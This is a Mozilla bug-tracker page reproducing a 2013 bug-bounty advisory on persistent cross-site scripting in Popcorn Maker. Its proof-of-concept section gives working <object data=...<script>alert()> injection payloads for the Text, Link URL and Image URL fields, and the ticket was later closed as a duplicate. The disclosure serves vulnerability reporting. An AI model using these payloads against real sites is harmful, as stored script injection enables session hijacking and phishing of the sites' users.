Status
People
(Reporter: curtisk, Assigned: mgoodwin)
Tracking
(Blocks: 1 bug)
Details
(Whiteboard: [site:popcorn.webmaker.org][wsec-xss])
Attachments
(5 attachments)
1.png
Date: Mon, 10 Jun 2013 20:28:04 +0100 From: Vulnerability Lab <admin@vulnerability-lab.com> To: Mozilla Security <security@mozilla.org> Subject: Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities -----//----- Title: ====== Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities Date: ===== 2013-06-10 References: =========== http://www.vulnerability-lab.com/get_content.php?id=966 VL-ID: ===== 966 Common Vulnerability Scoring System: ==================================== 3.2 Introduction: ============= Popcorn adds interactivity and context to online video, pulling the rest of the web right into the action in real time. Popcorn lets users link social media, news feeds, data visualizations and other content directly to moving images. The result is a new form of multimedia storytelling that lives and breathes more like the web itself: interactive, social, and unique each time. Popcorn is the result of ongoing collaboration between filmmakers, developers and webmakers. Together we explore how modern browser technologies like HTML5 can reshape moving images online. Popcorn Maker makes it easy to enhance, remix and share web video. Use your web browser to combine video and audio with content from the rest of the web — from text, links and maps to pictures and live feeds. (Copy of the Homepage: https://popcorn.webmaker.org & https://mozillalabs.com/en-US/Popcorn/ ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Mozilla Popcorn Maker (Webmaker) Application. Report-Timeline: ================ 2013-06-06: Researcher Notification & Coordination 2013-06-10: Vendor Notification 2013-00-00: Vendor Response/Feedback 2013-00-00: Vendor Fix/Patch 2013-00-00: Public Disclosure Status: ======== Unpublished Affected Products: ================== Mozilla Product: Popcorn Maker (Webmaker) 2013 Q2 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation web vulnerabilities are detected in the official Mozilla Popcorn Maker (WebMaker) Web Application. The vulnerability allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The persistent input validation vulnerabilities are located in the events und layer modules when processing to add `Text`, `Link URL`, `Image URL`, `video-container name` with malicious persistent script code (js/html). The script code will be executed when the website is processing to load the malicious manipulated web context of the input ago. Exploitation of the vulnerabilities requires no privileged application user account but low or medium required user interaction. Successful exploitation results in persistent session hijacking of mozilla accounts, persistent phishing, persistent external malware loads or redirects and persistent module web context manipulation. Vulnerable Service(s): [+] Mozilla Corp - Popcorn Maker (Webmaker.org - Mozilla Labs) Vulnerable Module(s): [+] Events [+] Layer Vulnerable Parameter(s): [+] Text [+] Link URL [+] Image URL [+] Video Container Name Affected Section(s): [+] Index Basic - Listing Proof of Concept: ================= The persistent input validation web vulnerabilities can be exploited by remote attackers without privilege application user account with low or medium required user interaction. For demonstration or reproduce ... --- Vulnerable Application Modules & Input Fields --- Module: Events > Text Input Fields: Text & Link URL Module: Events > Image Input Fields: Image URL & Link URL Module: Events > Popup Input Fields: Text & Link URL Module: Layer > Listing Input Fields: video-container name Reference(s): https://popcorn.webmaker.org/templates/basic/ Payload: <object data="data:text/html,<script>alert(1337)</script>"></object>--benDE PoC: Property-name (Text) & Link URL <label class="property-name">Text</label> <textarea data-manifest-key="text" class="value"><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(1337)</script>"></object></textarea> <div style="top: 105%; left: 50%;" class="butter-tooltip shift-enter-tooltip-1370021564314 tooltip-no-hover"> Press Shift+Enter for a new line.</div></fieldset><fieldset style="position: relative;" class="trackevent-property default input"> <label class="property-name">Link URL</label> <input value="<object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data=" data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab) </script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data=" data:text/html,<script>alert(1337)</script>"></object>" data-manifest-key="linkUrl" class="value" type="text"> <div style="top: 105%; left: 50%;" class="butter-tooltip text-link-tooltip1370021564317 tooltip-no-hover">Links will be clickable when shared.</div></fieldset> PoC: trackevent-property textarea - POP! <fieldset style="position: relative;" class="trackevent-property textarea"> <label class="property-name">Text</label> <textarea data-manifest-key="text" class="value">Pop! <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(1337)</script>"></object></textarea> PoC: linkUrl & text <label class="property-name">Link URL</label> <input value="<object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data=" data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab) </script>"></object><object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object data="data: text/html,<script>alert(1337)</script>"></object>" data-manifest-key="linkUrl" class="value" type="text"> <div style="top: 105%; left: 50%;" class="butter-tooltip text-link-tooltip1370021564317 tooltip-no-hover">Links will be clickable when shared.</div></fieldset> Solution: ========= Restrict the input fields with a secure char filter and parse the input and output listing in the application. Risk: ===== The security risk of the persistent input validation web vulnerabilities are estimated as medium. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY ADMINISTRATION CONTACT: admin@vulnerability-lab.com
|
(Reporter) | |
Comment 1•6 years ago
|
||
Created attachment 760894 [details]
PoC.rar|
|
(Reporter) | |
Comment 2•6 years ago
|
||
Created attachment 760895 [details] 1.png
|
|
(Reporter) | |
Comment 3•6 years ago
|
||
|
|
(Reporter) | |
Comment 4•6 years ago
|
||
|
|
(Reporter) | |
Comment 5•6 years ago
|
||
|
|
(Reporter) | |
Comment 6•6 years ago
|
||
assigned to mgoodwin for verification https://wiki.mozilla.org/Security/Web_Bug_Rotation#Web_Bug_Verification
Assignee: nobody → mgoodwin
|
(Assignee) | |
Updated•6 years ago
|
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → DUPLICATE
Whiteboard: [reporter-external][verif?] → [site:popcorn.webmaker.org][wsec-xss]
Duplicate of bug: 866026
|
||
Comment 8•6 years ago
|
||
Hello Mark Goodwin, the issue has been marked as duplicate in our database after you provided the details. The issue will be deleted from our upcomings and ensure the real researcher get the full credits for reporting the issue. Thanks Mark. We appreciate your cooperation and web vulnerability coordination. ~Benjamin Kunz Mejri
|
||
Updated•5 years ago
|
You need to log in
before you can comment on or make changes to this bug.
Description
•